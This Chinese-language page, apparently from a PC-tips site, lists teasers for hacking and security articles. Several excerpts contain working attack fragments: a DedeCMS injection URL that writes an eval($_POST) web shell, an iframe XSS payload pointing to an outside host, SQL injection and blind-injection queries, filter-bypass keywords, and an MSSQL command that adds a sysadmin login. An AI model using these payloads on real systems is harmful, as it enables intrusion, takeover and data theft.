内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

  • 请问你是黑客的菜吗?有效防范黑客入侵的绝招06月08日

    在大多数人看来,这也许只是网络世界中一群拥有高超电脑技术的专业人士代名词;或者,很多人印象中的黑客,就如同电影《黑客帝国》中展现的那样出神入化。Palo AltoNetworks日前发布了一项由其赞助的调查结果,这份调查揭露了神秘黑客的收入、攻击花费的时间

  • 你的账号密码是怎样丢失的?暴力破解攻击的检测和防御06月08日

    之前我们讲过关于 黑客1小时内破解16位密码 这样可怕的事情,里面提及了很多安全专家反复提醒用户设置账户和密码时要尽可能多样化,以防被破解。要知道,在这个大数据称霸天下的时代,网络安全意味着什么,意味着一切。 众所周知,iCloud艳照门其实并不高明

  • 如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱06月08日

    面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱。 这一切要从一次恶意邮件攻击活动开始。下图为我们最近监测到的一个以恶意文件为发送附件的邮件攻击

  • 黑客都很厉害吗 厉害的只是一小部分06月08日

    国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的世纪佳缘起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯卡兰尼克账号被盗,于是黑客话题又开始变得火热,黑客真的如你所想神秘又强大?真正技术高超的黑客到底是什么样的?

  • iPhone和Mac也会被黑 一条iMessage密码可能就被盗了02月17日

    一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞, 这次出现在苹果设备上、编号为CVE-2016-4631的高危漏洞(针对不同操作系统的编号会有差异,这里4631针对的是iOS), 要利用起来真是相当容易,因

  • https加密也被破解 HEIST攻击从加密数据获取明文01月26日

    在Black Hat 2016大会上,两名比利时的安全研究人员展示了他们今年的研究成果。他们发现了一个WEB攻击方式可以绕过HTTPS加密得到明文信息。他们把这种攻击方式叫做HEIST攻击。HEIST的全称是Encrypted Information can be Stolen through TCP-Windows。大体意

  • 速破解无线路由器密码的全过程04月25日

    笔记本取代台式机已经是不争的事实。笔记本最重要的功能之一就是可以支持Wi-Fi无线上网,无论高端的迅驰2还是低端的上网本都100%的内置了无线网卡。同时,无线路由器也不再高贵,便宜的只需要100多块钱,可以说无线上网的门槛已经大大降低。无线上网最大的优

  • DedeCms注入漏洞 影响版本5.3、5.5Posted in php04月23日

    假设域名是:www.abc.com 攻击步骤如下: 1. 访问网址: http://www.abc.com/plus/digg_frame.php?action=goodid=1024%651024mid=*/eval($_POST[x]);var_dump(3);? 可看见以下错误信息 注入成功 2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到

  • 渗透服务器 绕过防注入文件04月22日

    一般通用过滤字符串的关键字有以下这些: and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希

  • 个人主机 入侵网络攻击的步骤04月21日

    个人主机入侵网络攻击的步骤 第一步:隐藏自已的位置 为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽 量通过跳板或肉鸡展开攻击。所谓肉鸡通常是指,HACK实现通过后门程序控制 的傀儡主机,通过肉鸡开展的扫描及攻击,即便被发

  • 黑客入侵常用的新型万能登陆密码04月20日

    对于过滤了单引号或者做了post防注入的 站点,此方法也无能为力了;但对于很多对登陆端没做处理的网站,此方法值得一试,尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。 首先我们回顾下老的万能密码or漏洞的实现机制,

  • php+mysql5半自动注入工具图文教程04月19日

    基本上可以应付所有的php+mysql5的注入环境,因为自己可以直接修改注入语句,所以只要手工能绕过的过滤,该工具都可以。而且我添加了最新使用group_concat获取数据的方式,可以大大降低注入时提交的语句量和获取数据的时间。先看看界面吧: 注入界面应该都能

  • 巧用Cacls.exe命令来修改文件访问控制权限04月18日

    Cacls filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] Filename显示访问控制列表(以下简称ACL); /T更改当前目录及其所有子目录中指定文件的 ACL; /E 编辑 ACL 而不替换; /C在出现拒绝访问错误时继续; /G

  • SQL 手工注射原理小结04月16日

    一些常用的sql注入语句。下面我将介绍如何使用手工注入MYSQL,MSSQL数据库. 一般漏洞产生的原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码. 创建text数据表MYSQL代码: 复制代码 代码如下: create

  • dedecms v5.1/5.5 两处跨站漏洞的修复办法04月15日

    影响版本: dedecmsCMS V5.5 截止2010-03-18 17:50之前下载的所有版本,包含GBK和UTF-8版本 漏洞描述: 北洋贱队(http://bbs.seceye.org)首发 demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3Esearch

  • SQL注入中获取数据的一些技巧分析04月13日

    一、MSSQL获取数据: 用的比较多的就是for xml raw了,MSSQL2000都支持的! 注入中显示数据的两个办法均可以使用,一是union select、二是显错,以MSSQL2005为例: 复制代码 代码如下:select username from members where 1=2 union select top 3 username f

  • Mysql 另类盲注中的一些技巧小结04月11日

    一、order by 的参数注入技巧: 两种方法,思路都一样。 example. select username,password from uc_members order by.$_GET['oderby'] a.常见的利用方法: 1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value

  • 饶过Xplog70.dll玩入侵(参考防范)04月10日

    朋友叫我帮忙看看,这样和管理员的直接攻防较量我还没尝试过,所以也就答应了! 因为是数据库是SA权限连接的,我首先想到的是利用下面的命令: exec master.dbo.sp_addlogin renwoxin 我的目的是添加数据库用户renwoxin,然后将将其加入Sysadmin组: Exec mas

  • SQL注入攻击的种类和防范手段04月08日

    SQL注入攻击的种类 知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。

  • 手动mysql 高级注入实例分析04月07日

    利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制 http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段为 3 http://127.0.0.1/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.

© 2002-2017 dngsw.cn 电脑高手网 版权所有

粤ICP备13005586号-3